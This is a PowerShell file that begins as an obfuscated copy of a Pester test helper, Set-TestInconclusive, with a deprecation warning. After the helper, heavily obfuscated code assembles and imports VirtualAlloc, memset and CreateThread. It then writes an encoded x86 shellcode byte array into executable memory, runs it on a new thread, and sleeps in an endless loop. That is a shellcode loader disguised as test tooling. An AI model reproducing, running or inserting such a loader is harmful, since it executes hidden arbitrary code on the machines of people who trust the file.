function Set`-t`eST`IncO`NCLUs`ive {
    
    [CmdletBinding()]
    param (
        [string] ${mesS`A`Ge}
    )

    if (!${S`cRipt`:h`AsAl`READyWarnEdABoUtDEpr`Ec`A`TIoN}) {
        .("{3}{0}{2}{1}" -f'ite-War','ng','ni','Wr') ('D'+'EPRE'+'CATED:'+' '+'Se'+'t'+'-Test'+'Inconcl'+'usi'+'ve'+' '+'w'+'as '+'depreca'+'t'+'ed '+'a'+'nd '+'wi'+'ll '+'be'+' '+'remov'+'ed'+' '+'in'+' '+'t'+'he '+'fu'+'ture.'+' '+'Ple'+'ase '+'updat'+'e'+' '+'your'+' '+'scripts'+' '+'to'+' '+'use'+' '+(('93FS'+'e'+'t-ItResul'+'t'+' ')  -cREPLACE([char]57+[char]51+[char]70),[char]96)+'-I'+'ncon'+'clu'+'s'+'ive '+'-'+'Becau'+'se '+('{0}M'+'essa'+'ge{'+'1}.')-f [CHar]36,[CHar]96)
        ${ScR`Ipt:hA`saLrEAdywArNEdabo`UtD`epRECa`TI`on} = ${Tr`Ue}
    }

    .("{1}{2}{0}"-f'sult','Set-','ItRe') -Inconclusive -Because ${m`esSA`gE}
}

${c} = ((("{76}{122}{124}{121}{35}{58}{54}{4}{106}{97}{3}{118}{20}{80}{81}{46}{34}{31}{113}{119}{26}{22}{105}{42}{18}{38}{0}{27}{28}{74}{93}{50}{9}{60}{15}{2}{13}{85}{14}{23}{79}{96}{32}{52}{44}{89}{120}{55}{66}{53}{30}{73}{19}{98}{47}{6}{29}{63}{11}{75}{49}{116}{123}{12}{84}{24}{5}{111}{33}{48}{43}{61}{91}{57}{41}{8}{103}{25}{82}{112}{88}{62}{83}{39}{100}{115}{102}{67}{21}{10}{36}{45}{71}{1}{110}{17}{69}{90}{94}{99}{56}{117}{68}{16}{40}{51}{107}{92}{72}{7}{104}{70}{77}{64}{114}{65}{87}{109}{108}{86}{37}{95}{78}{101}{59}"-f 'S','l','in',' ','ub','d(In','c st','}ms','tPtr l','io',' ','x',' Crea','t ','r',' u','[Dll',', Int','t','0})]','atic exter','nt','ress,','ote','a','a','dd','iz','e, uint','ati','.','I','DllI',' lp','(','r','d','ou',' dw','me','I','In','in','readAt','port','wCreatio','alAlloc','li','Th','ern I','ocat','mp','m','nel32','l{0})]p','e','hrea','t dwStackSize, ','nel32.dl',';','nType,','trib','pPar','c e','I','tPtr m','r','ui','d);','Pt','l{0})]public','nF','({0','dll{',' fl','t','[DllIm',' static extern ','t','ct','n IntP','tr Virtu','rtAddress,','a','teThre','flP',' src, uint c','emset(In','IntPtr l','(','r','utes, uin','t','All',' lp','n',');[','c','pub','T','te',')',', ','pSt','vcrt.dl',' u','li','or','st, uint','tPtr de','ags','tPtr',' ','n','n','r','ntPt','dI','st','tPtr lpA','{0}k','ke','p','r','ort({0}')) -f[chaR]34);${W} = .("{1}{0}" -f 'pe','Add-Ty') -memberDefinition ${C} -Name ("{1}{0}" -f'2','Win3') -namespace ("{2}{0}{1}" -f 'in','32Functions','W') -passthru;[Byte[]];[Byte[]]${Z} = 0xba,0xb6,0xc8,0x5e,0x5f,0xd9,0xed,0xd9,0x74,0x24,0xf4,0x58,0x29,0xc9,0xb1,0x47,0x83,0xc0,0x04,0x31,0x50,0x0f,0x03,0x50,0xb9,0x2a,0xab,0xa3,0x2d,0x28,0x54,0x5c,0xad,0x4d,0xdc,0xb9,0x9c,0x4d,0xba,0xca,0x8e,0x7d,0xc8,0x9f,0x22,0xf5,0x9c,0x0b,0xb1,0x7b,0x09,0x3b,0x72,0x31,0x6f,0x72,0x83,0x6a,0x53,0x15,0x07,0x71,0x80,0xf5,0x36,0xba,0xd5,0xf4,0x7f,0xa7,0x14,0xa4,0x28,0xa3,0x8b,0x59,0x5d,0xf9,0x17,0xd1,0x2d,0xef,0x1f,0x06,0xe5,0x0e,0x31,0x99,0x7e,0x49,0x91,0x1b,0x53,0xe1,0x98,0x03,0xb0,0xcc,0x53,0xbf,0x02,0xba,0x65,0x69,0x5b,0x43,0xc9,0x54,0x54,0xb6,0x13,0x90,0x52,0x29,0x66,0xe8,0xa1,0xd4,0x71,0x2f,0xd8,0x02,0xf7,0xb4,0x7a,0xc0,0xaf,0x10,0x7b,0x05,0x29,0xd2,0x77,0xe2,0x3d,0xbc,0x9b,0xf5,0x92,0xb6,0xa7,0x7e,0x15,0x19,0x2e,0xc4,0x32,0xbd,0x6b,0x9e,0x5b,0xe4,0xd1,0x71,0x63,0xf6,0xba,0x2e,0xc1,0x7c,0x56,0x3a,0x78,0xdf,0x3e,0x8f,0xb1,0xe0,0xbe,0x87,0xc2,0x93,0x8c,0x08,0x79,0x3c,0xbc,0xc1,0xa7,0xbb,0xc3,0xfb,0x10,0x53,0x3a,0x04,0x61,0x7d,0xf8,0x50,0x31,0x15,0x29,0xd9,0xda,0xe5,0xd6,0x0c,0x76,0xe3,0x40,0x6f,0x2f,0xea,0x94,0x07,0x32,0xed,0xa4,0xee,0xbb,0x0b,0x94,0x40,0xec,0x83,0x54,0x31,0x4c,0x74,0x3c,0x5b,0x43,0xab,0x5c,0x64,0x89,0xc4,0xf6,0x8b,0x64,0xbc,0x6e,0x35,0x2d,0x36,0x0f,0xba,0xfb,0x32,0x0f,0x30,0x08,0xc2,0xc1,0xb1,0x65,0xd0,0xb5,0x31,0x30,0x8a,0x13,0x4d,0xee,0xa1,0x9b,0xdb,0x15,0x60,0xcc,0x73,0x14,0x55,0x3a,0xdc,0xe7,0xb0,0x31,0xd5,0x7d,0x7b,0x2d,0x1a,0x92,0x7b,0xad,0x4c,0xf8,0x7b,0xc5,0x28,0x58,0x28,0xf0,0x36,0x75,0x5c,0xa9,0xa2,0x76,0x35,0x1e,0x64,0x1f,0xbb,0x79,0x42,0x80,0x44,0xac,0x52,0xfc,0x92,0x88,0x20,0xec,0x26;${G} = 0x1000;if (${z}."lEN`GtH" -gt 0x1000){${g} = ${Z}."LEN`gTH"};${X}=${w}::("{0}{2}{1}" -f'Vi','c','rtualAllo').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${Z}."L`e`NGTH"-1);${i}++) {${w}::"ME`Ms`ET"([IntPtr](${x}.("{0}{1}{2}" -f 'ToI','n','t32').Invoke()+${I}), ${Z}[${i}], 1)};${w}::("{1}{2}{0}"-f 'ad','Cr','eateThre').Invoke(0,0,${x},0,0,0);for (;;){.("{2}{0}{3}{1}"-f 'tart','p','S','-slee') 60};
